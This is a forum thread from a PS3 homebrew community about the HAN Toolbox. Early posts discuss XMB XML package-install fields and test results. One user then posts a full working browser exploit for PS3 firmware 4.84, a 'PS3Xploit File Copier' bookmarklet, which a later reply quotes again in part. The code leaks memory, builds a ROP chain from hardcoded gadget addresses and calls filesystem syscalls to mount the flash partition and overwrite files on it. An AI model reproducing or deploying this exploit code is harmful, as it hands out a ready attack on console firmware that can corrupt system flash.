HAN Toolbox

PS3 HAN Toolbox - The Xploit 3.0 Companion v0.7.1

Go to download
Overview Extra info Updates (12) Reviews (24) History Discussion
ShaolinAssassin said:
Finally : nope, I never tested your suggestion. What I do know is that, if <Pair key="content_id"> is wrong or blank while content_id is present in the PARAM.SFO file, the PKG gets downloaded but install fails.
Click to expand...
The reason why i was wondering if is really needed is because usually the homebrew PKGs doesnt uses it in the SFO (at this point i dont remember any homebrew using it)

It seems the firmware downloads the PKG, and then it checks the CONTENT_ID before extracting the PKG contents (either from the PKG header, metadata, or from the SFO inside the PKG)
But this happens because in the xml is mentioned the <Pair key="content_id">
So the theory is... if we remove this line in the xml maybe we are disabling that check that happens inmediatly after the PKG is downloaded ?

Dunno, the way you are doing it actually is fine because is not problematic, but if it works without the CONTENT_ID it will be a bit more simple

That "pair keys" are used always together in OFW, but im not so sure if someone tryed to remove a few of them, this ones are candidates to be removed imo (for tests trying to make it the most simple posible):
<Pair key="pkg_src_qa">, <Pair key="content_name">, <Pair key="content_id">

What does the <Pair key="content_name"><String>pkg_pc</String></Pair> btw ?
That name pkg_pc is visible somewhere, is related with some ID that was added to the PKG when it was built ?
 
sandungas said:
The reason why i was wondering if is really needed is because usually the homebrew PKGs doesnt uses it in the SFO (at this point i dont remember any homebrew using it)

It seems the firmware downloads the PKG, and then it checks the CONTENT_ID before extracting the PKG contents (either from the PKG header, metadata, or from the SFO inside the PKG)
But this happens because in the xml is mentioned the <Pair key="content_id">
So the theory is... if we remove this line in the xml maybe we are disabling that check that happens inmediatly after the PKG is downloaded ?

Dunno, the way you are doing it actually is fine because is not problematic, but if it works without the CONTENT_ID it will be a bit more simple

That "pair keys" are used always together in OFW, but im not so sure if someone tryed to remove a few of them, this ones are candidates to be removed imo (for tests trying to make it the most simple posible):
<Pair key="pkg_src_qa">, <Pair key="content_name">, <Pair key="content_id">

What does the <Pair key="content_name"><String>pkg_pc</String></Pair> btw ?
That name pkg_pc is visible somewhere, is related with some ID that was added to the PKG when it was built ?
Click to expand...
Content ID is taken from PKG header like you mentioned, PARAM.SFO doesn't even have an entry for content ID.
 
lmn7 said:
Content ID is taken from PKG header like you mentioned, PARAM.SFO doesn't even have an entry for content ID.
Click to expand...
Is not usual for a homebrew to have an SFO with CONTENT_ID (written that way in uppercase) but they are using it in the HAN toolbox download it from the link and take a look

And as far @ShaolinAssassin mentioned, the installation fails (after downloading it) if the CONTENT_ID doesnt exists in the PARAM.SFO, so in this case the firmware is reading it from the SFO (before installing it)
 
sandungas said:
Is not usual for a homebrew to have an SFO with CONTENT_ID (written that way in uppercase) but they are using it in the HAN toolbox download it from the link and take a look

And as far @ShaolinAssassin mentioned, the installation fails (after downloading it) if the CONTENT_ID doesnt exists in the PARAM.SFO, so in this case the firmware is reading it from the SFO (before installing it)
Click to expand...
hmmm I stand corrected, I don't think I've seen it in an SFO file before.

It doesn't make sense that the PS3 checks it from the SFO though, that means after downloading the pkg the SFO is extracted (by itself) and checked, this is very unusual behaviour. It seems more logical that it would just check the header in the pkg.

Actually this may be what is happening at the end of the download, the PS3 kind of locks up before continuing with installation of the pkg. I guess during this time, the sfo is extracted & checked. Interesting.

@ShaolinAssassin What's the source of this net_package_install method? Do you know which file this was found in?

Edit: It can't be checked from SFO because I've made pkgs without CONTENT_ID inside of it, and they install fine.
 
Here are @DeViL303 's notes about this download method : https://www.psx-place.com/threads/n...installing-packages-and-rare-xmb-items.13756/


sandungas said:
And as far @ShaolinAssassin mentioned, the installation fails (after downloading it) if the CONTENT_ID doesnt exists in the PARAM.SFO, so in this case the firmware is reading it from the SFO (before installing it)
Click to expand...

You misread me I guess :) I said install fails if the <Pair key="content_id"> string from XML is wrong or blank - while CONTENT_ID exists in the PARAM.SFO. I did not tested the situation you are referring to.
 
Here you can see all the known parameters allowed by PS3 SFO format
https://www.psdevwiki.com/ps3/PARAM.SFO

The CONTENT_ID, NP_COMMUNICATION_ID are never used in homebrew because are usually related with expiration time of the license and things like that

The group of "pair key" used in this query we are talking about was found in a old official firmware, i think it was the "folding at home", "live with playstation" or the "home" apps
For this apps the CONTENT_ID was hardcoded in the xml with the goal of locking the download to that exact PKG

What im saying is i have doubts if that "locking" is mandatory or optional... incase is optional we can simple delete the line in the xml (and not include the CONTENT_ID in the SFO) and forget about it
 
ShaolinAssassin said:
You misread me I guess :) I said install fails if the <Pair key="content_id"> string from XML is wrong or blank - while CONTENT_ID exists in the PARAM.SFO. I did not tested the situation you are referring to.
Click to expand...
Ok sorry, that detail is important to deduce how is working :)

Anyway, the test needed to do is to delete the line in the xml (instead of blanking it, or using a wrong name, this tests looks more prone to fail)
If we are lucky and is optional... i guess after that it doesnt matters if the PARAM.SFO have the CONTENT_ID
 
sandungas said:
Ok sorry, that detail is important to deduce how is working :)

Anyway, the test needed to do is to delete the line in the xml (instead of blanking it, or using a wrong name, this tests looks more prone to fail)
If we are lucky and is optional... i guess after that it doesnt matters if the PARAM.SFO have the CONTENT_ID
Click to expand...

Tested. Download is working fine, but install fails (error 8002AE04).

Sans-titre-1.png

Code: 
<XMBML version="1.0">

    <View id="package_link">
        <Attributes>
            <Table key="han_toolbox_update">
                <Pair key="icon"><String>http://raw.githubusercontent.com/ShaolinAssassin/HAN-Toolbox/master/update_status/v0.7.1-update.png</String></Pair>
                <Pair key="title"><String>Update Toolbox</String></Pair>
                <Pair key="info"><String>Download and install the latest Toolbox package and reboot after</String></Pair>
            </Table>
        </Attributes>
        <Items>
            <Query
                class="type:x-xmb/folder-pixmap"
                key="han_toolbox_update"
                attr="han_toolbox_update"
                src="#han_toolbox_update_main"
                />
        </Items>
    </View>

    <View id="han_toolbox_update_main">
        <Attributes>
            <Table key="han_toolbox_update_item">
                <Pair key="info"><String>net_package_install</String></Pair>
                <Pair key="pkg_src"><String>https://www.dropbox.com/s/pynd7rpp0upkmvv/NP0001-HANTOOLBX_00-0000111122223333.pkg_signed.pkg?dl=1</String></Pair>
                <Pair key="pkg_src_qa"><String>https://www.dropbox.com/s/pynd7rpp0upkmvv/NP0001-HANTOOLBX_00-0000111122223333.pkg_signed.pkg?dl=1</String></Pair>
                <Pair key="content_name"><String>pkg_pc</String></Pair>
                <Pair key="prod_pict_path"><String>/dev_hdd0/game/HANTOOLBX/USRDIR/IMAGES/download.png</String></Pair>
            </Table>
        </Attributes>
        <Items>
            <Item class="type:x-xmb/xmlnpsignup" key="han_toolbox_update_item" attr="han_toolbox_update_item"/>
        </Items>
    </View>
 
</XMBML>

*

Edit : other tests :
1) if <Pair key="content_name"> string is missing, the download can not even start ;
2) it's value doesn't matter. <Pair key="content_name"><String>Hello world</String></Pair> worked fine and did not make any change visible : I could download and installed the PKG.
3) but it can't be blank, otherwise download doesn't start.
 
Last edited:
ShaolinAssassin said:
Tested. Download is working fine, but install fails (error 8002AE04).
Click to expand...
Ok, sorry for the rushing, after reading the other thread i remember @DeViL303 was trying to remove that 2 lines in the xml for the "pkg_src_qa" and the "content_id" to simplify it and i was involved in that talks but not sucess with them :/
Never minds, was just a detail without much importance

Btw, now you posted an screenshot of the SFO editor i guess the values of SOUND_FORMAT and the RESOLUTION could be replaced by zeroes too
The PKG is not going to boot (because uses BOOTABLE = 0) so are not doing anything useful

--------------
Sorry again for mentioning the <Pair key="content_name">... after reading the other thread i realized is loading a text string from inside the rco, the kind of strings that officially starts with the prefix "msg"
Like... "msg_my_text"
It confused me a bit because DeVil303 didnt started the names of the custom strings like that, but doesnt matters :)
 
Missed all this. I can explain some.

Removing the content ID entry from the xml completely will allow all file types to download fully even, i have done lots of testing on this method too. I think they might get deleted too at 100%. Cant remember now.

That field must be there though, every package has a long content ID, regardless of whether the field is in the param.sfo, and that lonf content ID must match the xml if you want a successful install. I never found a way around that.

Content name is what shows up when as the title on the XMB when you install the package, I added something there just so that we could add an entry to the rco sometime, like "download now" or something, at the moment there is no title for the actual item, and that is why we must do the extra sub menu. The issue is, that entry will only work from an RCO, ideally we could add the title of the package there and make all xmls much simpler. actually I had the first Demo downloader written like that. All titles were in the rco. I discovered if this field exists, but is not in the RCO, then the pkg name gets shown during download progress.

I started adding the long content ID to my packages because years ago. I needed it at one stage to install over another package without error, it might have been XMBMANPLS gamedata, not sure. To avoid this issue in future I just always added it from then on. I added it in normal way with params.sfo editor, and it works. So I doubt the order has any effect.
lmn7 said:
@ShaolinAssassin What's the source of this net_package_install method? Do you know which file this was found in?
Click to expand...
It has never been used in OFW as far as i know. :) I was looking through an sprx, and found "home_install" or something, but I knew about that, and i knew that required you to be logged into PSN to work. Next to it in the sprx was "net_package_install", so i tried it and it worked.
 
Last edited:
Hey guys, I've made some improvements to the awful file copier:

- Removed a lot of useless code
- Removed the device selection boxes as they were wasted space
- Changed exploit search base & size offsets
- Reduced search loop delay, initialization is much faster
- Removed the ability to reboot after copying, another useless feature that was wasting space

It now works much better, has a higher success rate, and is faster. You can even copy multiple files without even leaving the browser now! Still 4.84 only BTW.
Code: 
javascript:eval('var xtra_data,stack_frame,jump_2,jump_1,xtra_data_addr,stack_frame_addr,jump_2_addr,jump_1_addr,start_x="xxxx",offset_array=[],t_out=0,search_max_threshold=70*0x100000,search_base=0x80100000,search_size=2*mbytes,search_base_off=0,search_size_ext=0,gtemp_addr=0x8D000000,total_loops=0,max_loops=20,frame_fails=0,sp_exit=2413354176,ffs=4294967295,dbyte41=16705,dbyte00=0,byte_size=1,hword_size=2,word_size=4,dword_size=8,mbytes=1048576,stat_size_offset=40,fs_flag_readonly=0x0,template_1_file_buf_addr=0x8B000000,sc_fs_write=0x323,fs_mode=0x1B6,fs_flag_create=0x241,sc_fs_close=0x324,sc_fs_read=0x322,sc_fs_open=0x321,stat_size_offset=0x28,sc_fs_stat=0x328,store_idx_arr1,store_idx_arr2,flash_partition=\47xxxxCELL_FS_IOS:BUILTIN_FLSH1\47,filesystem=\47CELL_FS_FAT\47,mount_path=\47/dev_blind\47,sc_sm_shutdown=0x17B,flash_partition_addr=0,fs_addr=0,mount_path_addr=0,template_1_file_usb_addr=0,template_1_file_usb_readlen_addr=0,template_1_file_usbfd_addr=0,template_1_file_blind_addr=0,template_1_file_blindfd_addr=0,template_1_file_blind_writelen_addr=0,null_addr=0,stat_addr=0,sc_fs_umount=0x345,fail_msg_frag="\74br\76\74h1\76\74b\76\74span style=\47color:red\47\76Exploit initialization failed!\74/h1\76\74/span\76",progress_msg_frag1="\74br\76\74h1\76\74b\76Initializing exploit... ",progress_msg_frag2=\47%\74/h1\76\47,toc_addr=7296344,toc_entry1_addr=7185360,toc_entry2_addr=7494456,toc_entry3_addr=7185352,toc_entry4_addr=7602176,toc_entry5_addr=7255752,toc_entry6_addr=0,gadget1_addr=620036,gadget2_addr=6332644,gadget3_addr=872540,gadget4_addr=2267192,gadget5_addr=1227548,gadget6_addr=6380764,gadget7_addr=131024,gadget8_addr=131072,gadget11_addr=5874864,gadget12_addr=820812,gadget_mod1_addr=6352856,gadget_mod2_addr=80756,gadget_mod3_addr=757248,gadget_mod4a_addr=890500,gadget_mod4b_addr=4376440,gadget_mod4c_addr=346864,gadget_mod7_addr=108204,gadget_mod8_addr=2862264,gadget_mod9_addr=68384,gadget_mod12_addr=6500860,gadget_mod15_addr=3788856;document.write(\47\74html\76\74title\76PS3Xploit - File Copier\74/title\76\74b\76Source file path: \74/b\76\74input type="text" id="srcfile" name="srcfile" maxlength="200" size="50"\76\74br\76\74br\76\74b\76Destination file path: \74/b\76\74input type="text" id="desfile" name="desfile" maxlength="200" size="50"\76\74br\76\74br\76\74input type="button" value="Initialize" onclick="initROP(true)"/\76\74div id="result"\76\74/div\76\74div id="exploit"\76\74/div\76\74div id="trigger"\76\74/div\76\74/html\76\47);function setInnerHTML(a,b){if(a){a.innerHTML=b}}function showResult(a){setInnerHTML(document.getElementById(\47result\47),a)}function rop_exit_1val(a,b,c){var d=xtra_data.substr(store_idx_arr1[0],2).toAscii(true);var e=xtra_data.substr(store_idx_arr2[0],2).toAscii(true);var f;if((parseInt(d,16)!==0)&&(parseInt(d,16)===(parseInt(e,16)))){f=a}else{if(c){if((parseInt(d,16)!==parseInt(e,16))||(parseInt(d,16)===0))b+=c}f=b}showResult(f)}function syscall_r3_p2p(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4b_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function syscall_r3r5_p2p(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(d-0x4)+hexdw2bin(gtemp_addr)+fill_by_8bytes(0x18,dbyte41)+hexdw2bin(gadget_mod4c_addr)+fill_by_16bytes(0xB0,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4b_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function copy_file_overwrite(a,b,c,d,e,f,g,h,i,j){return memcpy(h+stat_size_offset,i,dword_size)+syscall(sc_fs_stat,a,h,0,0,0,0,0,0)+memcpy(j,h+stat_size_offset,word_size)+syscall(sc_fs_open,a,fs_flag_readonly,c,0,0,0,0,0)+syscall_r3r5_p2p(sc_fs_read,c,e,h+stat_size_offset,f,0,0,0,0,0,0)+syscall_r3_p2p(sc_fs_close,c,0,0,0,0,0,0,0,0,0)+validate_word_from_ptr(f+0x4,b,0)+syscall(sc_fs_open,b,fs_flag_create,d,fs_mode,i,0,0,0)+syscall_r3r5_p2p(sc_fs_write,d,e,h+stat_size_offset,g,0,0,0,0,0,0)+syscall_r3_p2p(sc_fs_close,d,0,0,0,0,0,0,0,0,0)}function load_r3_word_from_ptr_32(a,b,c,d,e,f,g){return hexdw2bin(gadget_mod3_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+hexdw2bin(a-0x8)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod15_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_8bytes(0x8,dbyte41)+hexdw2bin(b)+hexdw2bin(c)+hexdw2bin(d)+hexdw2bin(e)+hexdw2bin(f)+hexdw2bin(g)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function validate_word_from_ptr(a,b,c,d,e,f){if(d===null){d=gtemp_addr}if(e===null){e=gtemp_addr}if(f===null){f=gtemp_addr}return load_r3_word_from_ptr_32(a,gtemp_addr,gtemp_addr,gtemp_addr,gtemp_addr,b,gtemp_addr)+hexdw2bin(gadget_mod12_addr)+fill_by_16bytes(0x70,dbyte00)+fill_by_8bytes(0x8,dbyte00)+hexdw2bin(c)+fill_by_16bytes(0x10,dbyte00)+hexdw2bin(d)+hexdw2bin(e)+hexdw2bin(f)+hexdw2bin(c)+fill_by_8bytes(0x8,dbyte41)}function init_run(a,b,c,d,e){if(a===true){frame_fails=0;search_base_off=0;search_size_ext=0}if(t_out!==0){clearTimeout(t_out);t_out=0}offset_array=[];store_idx_arr1=[];store_idx_arr2=[];xtra_data_addr=0;stack_frame_addr=0;jump_2_addr=0;jump_1_addr=0;search_max_threshold=74*0x100000;search_base=0x80150000;search_size=2*mbytes;search_base_off=1*mbytes;search_size_ext=2*mbytes;total_loops++}function hexh2bin(a){return String.fromCharCode(a)}function hexw2bin(a){return String.fromCharCode(a\76\7616)+String.fromCharCode(a)}function hexdw2bin(a){return hexw2bin(0)+hexw2bin(a)}String.prototype.toHex16=function(){return(\470000\47+this).substr(-4)};String.prototype.toAscii=function(a){var b=\47\47;var i=0;while(i\74this.length){if(a===true){b+=this.charCodeAt(i).toString(16).toHex16()}else{b+=this.charCodeAt(i).toString(16)}i+=1}return b};String.prototype.convert=function(a){if(this.length\741){return\47\47}var b=\47\47;var c=\47\47;var i=0;var d=[];if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}while(i\74b.length){c=b.substr(i,4);d.push(String.fromCharCode(parseInt(c,16)));i+=4}return d.join(\47\47)};String.prototype.convertedSize=function(a){if(this.length\741){return 0}var b=\47\47;if(a===true){b=this}else{b=this.toAscii()}while((b.length%4)!==0){b+=\4700\47}if(b.substr(b.length-3,2)!==\4700\47){b+=\470000\47}return b.length/2};String.prototype.replaceAt=function(a,b){return this.substr(0,a)+b+this.substr(a+b.length)};String.prototype.repeat=function(a){return new Array(a+1).join(this)};Number.prototype.noExponents=function(){var a=String(this).split(/[eE]/);if(a.length===1){return a[0]}var z=\47\47,sign=this\740?\47-\47:\47\47,str=a[0].replace(\47.\47,\47\47),mag=Number(a[1])+1;if(mag\740){z=sign+\470.\47;while(mag++){z+=\470\47}return z+str.replace(/^\-/,\47\47)}mag-=str.length;while(mag--){z+=\470\47}return str+z};function fromIEEE754(a,b,c){var d=0;var g=[];var i;var j;var h;for(i=a.length;i;i-=1){h=a[i-1];for(j=8;j;j-=1){g.push(h%2?1:0);h=h\76\761}}g.reverse();var k=g.join(\47\47);var l=(1\74\74(b-1))-1;var s=parseInt(k.substring(0,1),2)?-1:1;var e=parseInt(k.substring(1,1+b),2);var f=parseInt(k.substring(1+b),2);if(e===(1\74\74b)-1){d=f!==0?NaN:s*Infinity}else if(e\760){d=s*Math.pow(2,e-l)*(1+f/Math.pow(2,c))}else if(f!==0){d=s*Math.pow(2,-(l-1))*(f/Math.pow(2,c))}else{d=s*0}return d.noExponents()}function generateIEEE754(a,b){var c=new Array((a\76\7624)&0xFF,(a\76\7616)&0xFF,(a\76\768)&0xFF,(a)&0xFF,(b\76\7624)&0xFF,(b\76\7616)&0xFF,(b\76\768)&0xFF,(b)&0xFF);return fromIEEE754(c,11,52)}function generateExploit(a,b){var n=(a\74\7432)|((b\76\761)-1);return generateIEEE754(a,(n-a))}function readMemory(a,b){if(document.getElementById(\47exploit\47)){document.getElementById(\47exploit\47).style.src="local("+generateExploit(a,b)+")"}}function checkMemory(a,b,c){if(document.getElementById(\47exploit\47)){readMemory(a,b);return document.getElementById(\47exploit\47).style.src.substr(6,c)}}function trigger(a){if(document.getElementById(\47trigger\47)){document.getElementById("trigger").innerHTML=-parseFloat("NAN(ffffe"+a.toString(16)+")")}}function load_check(){if(total_loops\74max_loops){showResult(progress_msg_frag1+((100/max_loops)*total_loops).toString()+progress_msg_frag2);t_out=setTimeout(initROP,500,false)}else{total_loops=0;showResult(fail_msg_frag);t_out=0}}function findJsVariableOffset(a,b,c,d){readMemory(c,d);var e=document.getElementById(\47exploit\47).style.src.substr(6,d);var i=0;var t;var k;var f;var g;while(i\74(e.length*2)){if(e.charCodeAt(i/2)===b.charCodeAt(0)){f=0;for(k=0;k\74(b.length*2);k+=0x2){if(e.charCodeAt((i+k)/2)!==b.charCodeAt(k/2)){break}f+=1}if(f===b.length){g=c+i+4;for(t=0;t\74offset_array.length;t+=1){if(offset_array[t]===g){return-1}}offset_array.push(g);return g}}i+=0x10}var h=c+d;return 0}function memcpy(a,b,c){return callsub(gadget8_addr,a,b,c,0,0,0,0,0,0,0x70)}function stack_frame_hookup(){return unescape("\u4141\u2A2F")+hexw2bin(gadget1_addr)+hexw2bin(toc_addr)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(toc_addr)+fill_by_16bytes(0x70,dbyte41)}function stack_frame_exit(){return hexdw2bin(gadget_mod8_addr)+unescape("\u2F2A")}function syscall(a,b,c,d,e,f,g,h,i,j){if(j===null){j=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(a)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod4a_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(j)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function callsub(a,b,c,d,e,f,g,h,i,j,k,l,m){var n=0x20;if(m===null){m=gtemp_addr}if(l===null){l=gtemp_addr}return hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(gtemp_addr)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod1_addr)+fill_by_16bytes(0x50,dbyte41)+fill_by_4bytes(0xC,dbyte41)+hexw2bin(j)+hexw2bin(i)+hexw2bin(g)+hexw2bin(f)+hexw2bin(e)+hexw2bin(d)+hexw2bin(c)+fill_by_4bytes(0x4,dbyte41)+hexw2bin(h)+fill_by_16bytes(0x20,dbyte41)+hexdw2bin(b)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(gadget_mod2_addr)+fill_by_16bytes(0x60,dbyte41)+hexdw2bin(l)+fill_by_16bytes(0x10,dbyte41)+hexdw2bin(a)+fill_by_16bytes(k-n,dbyte00)+hexdw2bin(m)+hexdw2bin(sp_exit)+fill_by_8bytes(0x8,dbyte41)}function fill_by_4bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/4){c+=e.repeat(2);d++}return c}function fill_by_8bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/8){c+=e.repeat(4);d++}return c}function fill_by_16bytes(a,b){var c=\47\47;var d=0;var e=hexh2bin(b);while(d\74a/16){c+=e.repeat(8);d++}return c}function initROP(a){try{init_run(a,0x80200000,5/2*mbytes,0*mbytes,0*mbytes);var b=0x8B200000;template_1_file_usb=document.getElementById("srcfile").value;template_1_file_blind=document.getElementById("desfile").value;xtra_data=flash_partition.convert()+filesystem.convert()+mount_path.convert()+template_1_file_usb.convert()+fill_by_4bytes(0xC,dbyte00)+template_1_file_blind.convert()+fill_by_4bytes(0xC,dbyte00)+fill_by_16bytes(0x70,dbyte00)+unescape("\uFD7E");while(xtra_data_addr===0){if(search_max_threshold\74search_size){load_check();return}xtra_data=xtra_data.replaceAt(0,hexh2bin(0x7EFD));xtra_data_addr=findJsVariableOffset("xtra_data",xtra_data,search_base,search_size);search_max_threshold-=search_size}flash_partition_addr=xtra_data_addr;fs_addr=flash_partition_addr+flash_partition.convertedSize()-0x4;mount_path_addr=fs_addr+filesystem.convertedSize();template_1_file_usb_addr=mount_path_addr+mount_path.convertedSize();template_1_file_usbfd_addr=template_1_file_usb_addr+template_1_file_usb.convertedSize();template_1_file_usb_readlen_addr=template_1_file_usbfd_addr+word_size;template_1_file_blind_addr=template_1_file_usb_readlen_addr+dword_size;template_1_file_blindfd_addr=template_1_file_blind_addr+template_1_file_blind.convertedSize();template_1_file_blind_writelen_addr=template_1_file_blindfd_addr+word_size;store_idx_arr1[0]=(template_1_file_blind_writelen_addr-flash_partition_addr+0x8)/2;null_addr=template_1_file_blind_writelen_addr+dword_size;store_idx_arr2[0]=(null_addr-flash_partition_addr+0xC)/2;stat_addr=null_addr+dword_size*0x3;stack_frame=stack_frame_hookup()+syscall(sc_fs_umount,flash_partition_addr,fs_addr,mount_path_addr,0,0,0,0,0)+copy_file_overwrite(template_1_file_usb_addr,template_1_file_blind_addr,template_1_file_usbfd_addr,template_1_file_blindfd_addr,b,template_1_file_usb_readlen_addr,template_1_file_blind_writelen_addr,stat_addr,null_addr,null_addr+0x8)+stack_frame_exit();while(stack_frame_addr===0){if(search_max_threshold\74search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0}load_check();return}stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);if(stack_frame_addr==-1)if(search_max_threshold\74search_size+search_size_ext){frame_fails++;load_check();return}search_max_threshold-=search_size+search_size_ext}jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");while(jump_2_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);if(jump_2_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");while(jump_1_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);if(jump_1_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}var c=checkMemory(stack_frame_addr-0x4,0x8000,stack_frame.length);var x=checkMemory(xtra_data_addr-0x4,0x1000,xtra_data.length);var d=checkMemory(jump_2_addr-0x4,0x1000,jump_2.length);var f=checkMemory(jump_1_addr-0x4,0x1000,jump_1.length);if((d===jump_2)&&(f===jump_1)&&(x===xtra_data)&&(c===stack_frame)){if(t_out!==0){clearTimeout(t_out)}triggerX()}else{load_check()}}catch(e){}}function triggerX(){setTimeout(trigger,1000,jump_1_addr);setTimeout(rop_exit_1val,2000,"\74br\76\74h1\76\74b\76\74span style=\47color:green\47\76File copied successfully!\74/h1\76\74/span\76","\74br\76\74h1\76\74b\76\74span style=\47color:red\47\76File copy failed!\74/h1\76\74/span\76","");t_out=0;total_loops=0}');
 
Last edited:
lmn7 said:
Hey guys, I've made some improvements to the awful file copier:

- Removed a lot of useless code
- Removed the device selection boxes as they were wasted space
- Changed exploit search base & size offsets
- Reduced search loop delay, initialization is much faster
- Removed the ability to reboot after copying, another useless feature that was wasting space

It now works much better, has a higher success rate, and is faster. You can even copy multiple files without even leaving the browser now! Still 4.84 only BTW.
Click to expand...

@lmn7 IIRC You also have a simple file copier with 2 parameters (source & destination files).

I have this idea: It would be nice for HAN & CFW users to have an XMB menu (organized by source folders) with the most frequently copied files already created + the copier above (for custom copy). Also the PKG Linker could be used to create a dynamic xml with the files to be copied.

@DeViL303 @ShaolinAssassin @pink1 What do you think?
 
lmn7 said:
Hey guys, I've made some improvements to the awful file copier:

- Removed a lot of useless code
- Removed the device selection boxes as they were wasted space
- Changed exploit search base & size offsets
- Reduced search loop delay, initialization is much faster
- Removed the ability to reboot after copying, another useless feature that was wasting space

It now works much better, has a higher success rate, and is faster. You can even copy multiple files without even leaving the browser now! Still 4.84 only BTW.
Code: 
javascript:eval('var xtra_data,stack_frame,jump_2,jump_1,xtra_data_addr,stack_frame_addr,jump_2_addr,jump_1_addr,start_x="xxxx",offset_array=[],t_out=0,search_max_threshold=70*0x100000,search_base=0x80100000,search_size=2*mbytes,search_base_off=0,search_size_ext=0,gtemp_addr=0x8D000000,total_loops=0,max_loops=20,frame_fails=0,sp_exit=2413354176,ffs=4294967295,dbyte41=16705,dbyte00=0,byte_size=1,hword_size=2,word_size=4,dword_size=8,mbytes=1048576,stat_size_offset=40,fs_flag_readonly=0x0,template_1_file_buf_addr=0x8B000000,sc_fs_write=0x323,fs_mode=0x1B6,fs_flag_create=0x241,sc_fs_close=0x324,sc_fs_read=0x322,sc_fs_open=0x321,stat_size_offset=0x28,sc_fs_stat=0x328,store_idx_arr1,store_idx_arr2,flash_partition=\47xxxxCELL_FS_IOS:BUILTIN_FLSH1\47,filesystem=\47CELL_FS_FAT\47,mount_path=\47/dev_blind\47,sc_sm_shutdown=0x17B,flash_partition_addr=0,fs_addr=0,mount_path_addr=0,template_1_file_usb_addr=0,template_1_file_usb_readlen_addr=0,template_1_file_usbfd_addr=0,template_1_file_blind_addr=0,template_1_file_blindfd_addr=0,template_1_file_blind_writelen_addr=0,null_addr=0,stat_addr=0,sc_fs_umount=0x345,fail_msg_frag="\74br\76\74h1\76\74b\76\74span style=\47color:red\47\76Exploit initialization failed!\74/h1\76\74/span\76",progress_msg_frag1="\74br\76\74h1\76\74b\76Initializing exploit... 